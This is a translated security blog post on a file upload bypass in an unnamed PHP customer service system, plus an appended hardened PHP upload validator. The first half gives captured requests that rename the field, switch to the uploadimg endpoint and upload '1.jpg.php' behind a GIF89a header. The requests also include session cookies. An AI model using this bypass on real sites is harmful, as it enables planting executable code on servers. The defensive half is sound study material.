File upload vulnerability in a PHP customer service system

彦祖 187

Preface

Written on a whim, thinking out loud.

Visit: /index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1
The default business ID is 1. Connect to a customer service agent first, otherwise file upload is not available.

/admin/login/index/business_id/1.html
One agent-side page and one admin backend; not much use on their own.

The ID parameter for the corresponding agent:

business_id  

groupid=1 is the agent group

First POST request

POST /admin/event/upload HTTP/1.1
Host: xx
Connection: close
Content-Length: 5306
Cache-Control: max-age=0
Origin: https://xx
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypU1bMpOOJxjkOoe8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://xx/index/index?code=vbSWPfra3nKF0yYFJIXazW00LzJy4Ffuh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6b7ukkvkqe9417kjlhabee2vlh; uid=1; token=b22056be-ef3f-4b67-9d8c-9bc3043c94c3; thinkphp_show_page_trace=1|1; HJLIVE_APP_FLAG=2; service_token=br5N%2B9nOqtxe

------WebKitFormBoundarypU1bMpOOJxjkOoe8
Content-Disposition: form-data; name="upload"; filename="timg.jpg"
Content-Type: image/jpeg

DATA
------WebKitFormBoundarypU1bMpOOJxjkOoe8--

Parameter modification: change
Content-Disposition: form-data; name="upload"
to
Content-Disposition: form-data; name="editormd-image-file"

POST request path: change
/admin/event/upload
to
/admin/event/uploadimg

POST /admin/event/uploadimg HTTP/1.1
Host: xx
Content-Length: 1091
Accept: */*
Origin: http://xx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1FiuKMxJGmw4fU34
Referer: http://xx/index/index?code=vbSWPfra3nKF0yYFJIXazW00LzJy4Ffuh
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: time=; thinkphp_show_page_trace=0|0; cu_com=; PHPSESSID=a8b4rfn2dedubj6svbdq3ghh8j; uid=1; token=9a90c51f-94ed-4e73-83f9-4492618a5e6a; Hm_lvt_be866aea230bec6f5762b245ccea50b0=1605445353; HJLIVE_APP_FLAG=2; Hm_lpvt_be866aea230bec6f5762b245ccea50b0=1605445381; service_token=br5N%2B9nOqtxe
Connection: close

------WebKitFormBoundary1FiuKMxJGmw4fU34
Content-Disposition: form-data; name="editormd-image-file"; filename="1.jpg.php"
Content-Type: image/png

GIF89a
------WebKitFormBoundary1FiuKMxJGmw4fU34--
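The two requests above differ only in the endpoint and the form field name, yet the second one accepts a filename ending in .php whose body is just a GIF89a header. The post does not show the server-side code, so what follows is an added example, not code from the original post or from the system it describes: a generic hardened validator for an image upload handler in PHP, written the way a defender would want the uploadimg endpoint to behave. The function names, the upload directory and the response shape are assumptions; the form field name editormd-image-file is taken from the second request.

```php
<?php
// Added example (not from the original post or the system it describes):
// server-side validation for an image upload handler. Function names,
// paths and the response format are assumptions.

// Whitelist of the only extensions the handler will ever write to disk,
// mapped to the MIME type the file contents must actually carry.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
];

/**
 * Validate one uploaded file and return a safe target filename, or throw.
 *
 * @param string $clientName  Filename sent by the client (untrusted).
 * @param string $tmpPath     Path of the uploaded temp file ($_FILES[...]['tmp_name']).
 */
function validate_image_upload(string $clientName, string $tmpPath): string
{
    // 1. Work on the basename only: strip any directory components.
    $base = basename(str_replace('\\', '/', $clientName));

    // 2. Reject multi-extension names such as "1.jpg.php" outright instead
    //    of trying to decide which extension "counts".
    $parts = explode('.', $base);
    if (count($parts) !== 2 || $parts[0] === '') {
        throw new RuntimeException('filename must have exactly one extension');
    }
    $ext = strtolower($parts[1]);

    // 3. The extension must be on the whitelist. A denylist of "php",
    //    "phtml", ... is the usual mistake in handlers like uploadimg.
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        throw new RuntimeException("extension .$ext is not allowed");
    }

    // 4. Content check: the MIME type detected from the bytes must match the
    //    claimed extension. A GIF header under a .jpg name fails here; a
    //    GIF header under a .php name already failed steps 2 and 3.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if (!in_array($detected, ALLOWED_IMAGE_TYPES[$ext], true)) {
        throw new RuntimeException("content type $detected does not match .$ext");
    }

    // 5. The file must decode as a real image with sane dimensions, so a
    //    file consisting of nothing but a magic-byte prefix is rejected too.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[0] < 1 || $info[1] < 1) {
        throw new RuntimeException('file is not a decodable image');
    }

    // 6. Never reuse the client name on disk: generate a random name and
    //    attach only the whitelisted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Assumed handler wiring for the uploadimg endpoint.
function handle_uploadimg(string $uploadDir): array
{
    $field = 'editormd-image-file'; // field name from the captured request
    if (!isset($_FILES[$field]) || $_FILES[$field]['error'] !== UPLOAD_ERR_OK) {
        return ['success' => 0, 'message' => 'no file'];
    }
    $f = $_FILES[$field];
    try {
        $safeName = validate_image_upload($f['name'], $f['tmp_name']);
    } catch (RuntimeException $e) {
        return ['success' => 0, 'message' => $e->getMessage()];
    }
    // $uploadDir should additionally be served with script execution
    // disabled, so that a future validation bypass still cannot run code.
    $target = rtrim($uploadDir, '/') . '/' . $safeName;
    if (!move_uploaded_file($f['tmp_name'], $target)) {
        return ['success' => 0, 'message' => 'write failed'];
    }
    return ['success' => 1, 'url' => '/uploads/' . $safeName];
}
```

The checks are layered on purpose: the extension whitelist is the control that the captured request actually defeats, the MIME and decode checks catch content that merely carries an image prefix, and the random server-side name removes the client's influence over the path entirely. Serving the upload directory without a PHP handler is the backstop if any of the three is bypassed.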
